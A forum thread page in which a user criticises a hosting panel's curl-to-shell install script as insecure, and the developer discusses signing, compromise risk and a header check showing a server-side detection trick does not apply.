Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us $3,400 per month for bandwidth bills alone, and since we don't believe in shoving popup ads to our registered users, we try to make the money back through forum registrations.
«119 »
  • Post
  • Reply
jre
Sep 2, 2011

To the cloud ?





nem posted:

Sure. Thatís why the source is on Github. You can wget and invoke from shell if thatís your thing too.

Or you could put a tiny bit more effort in and publish signed packages and not have a embarrassingly insecure install method for a product with "integrated security" ?

Adbot
ADBOT LOVES YOU

nem
Jan 4, 2003

Managed + self-hosted hosting platforms since 2002.


jre posted:

Or you could put a tiny bit more effort in and publish signed packages and not have a embarrassingly insecure install method for a product with "integrated security" ?

SHA2 is on apisnetworks.com if you need that. It's for a pristine server. You can always pull the repos and inspect history if necessary. You still have control over it and the expectation is that you'll wipe it after benchmarking. All source is publicly available through the script + Bitbucket repos. Submit a PR if you'd like to improve it. It's still pre-alpha. This script is the most rudimentary step of the entire process. All RPMs are signed. Source code is not signed yet, because it's still before 3.0.

I can sign it with whatever key, but does not mean it is secure unless you trust the signing source, which puts us at an impasse.

jre
Sep 2, 2011

To the cloud ?





nem posted:

SHA2 is on apisnetworks.com if you need that. It's for a pristine server. You can always pull the repos and inspect history if necessary. You still have control over it and the expectation is that you'll wipe it after benchmarking. All source is publicly available through the script + Bitbucket repos. Submit a PR if you'd like to improve it. It's still pre-alpha. This script is the most rudimentary step of the entire process. All RPMs are signed. Source code is not signed yet, because it's still before 3.0.

I can sign it with whatever key, but does not mean it is secure unless you trust the signing source, which puts us at an impasse.

So even ignoring fun tricks like this https://www.idontplaydarts.com/2016...sh-server-side/

There's a fundamental difference in security between having a package signed with a private key that you keep safely offline, and a random script on github which you only need to obtain push permissions to compromise. People regularly accidentally leak github api keys because it's an easy thing to do in integrations. It happened to home-brew recently.

Saying people can manually check the hash or audit the code every time they go to run the script to check it's not been compromised is silly

nem
Jan 4, 2003

Managed + self-hosted hosting platforms since 2002.



This example appears to work for chunked encoding only...

code:
# curl -I [url]https://raw.githubusercontent.com/apisnetworks/apnscp-bootstrapper/master/bootstrap.sh[/url]

HTTP/1.1 200 OK
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
ETag: "cbc17bdc7fea3ebee66d718d9b7ec5e2c0621c9e"
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
X-Geo-Block-List:
X-GitHub-Request-Id: CC46:4984:9D0AF:A5913:5B720AF2
Content-Length: 4674
Accept-Ranges: bytes
Date: Mon, 13 Aug 2018 22:49:23 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-msp9220-MSP
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1534200564.590134,VS0,VE30
Vary: Authorization,Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 5d1766d1abc8b92d22d005bbe9fac3b7d6b23661
Expires: Mon, 13 Aug 2018 22:54:23 GMT
Source-Age: 0
Downloaded the example from the blog. Reproduced so long as the server sends chunked encoding, but Github doesn't chunk its encoding for small files so you can't stuff the stream with arbitrary code. Neat hypothetical nonetheless and something to consider going forward with how data is sent over the panel.

Compromised? Sure, anyone can get compromised. Unless there are two separate processes for pushing code and signing releases, compromising one most likely implies the second is compromised.

MITM? Possible, but then you'd have bigger problems with all of Github. I've open-sourced some components and put them on Github/Bitbucket for that very reason. Right now, with multiple releases pushed daily, it's important to get to a milestone that I can tag and freeze the release, then sign these milestones. I'm still a few months from a final release interested in collecting usage data at this point, which again is why I asked if they had 90 minutes to burn and wipe after running.

All advice is helpful when it becomes relevant for that particular milestone.

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply
«119 »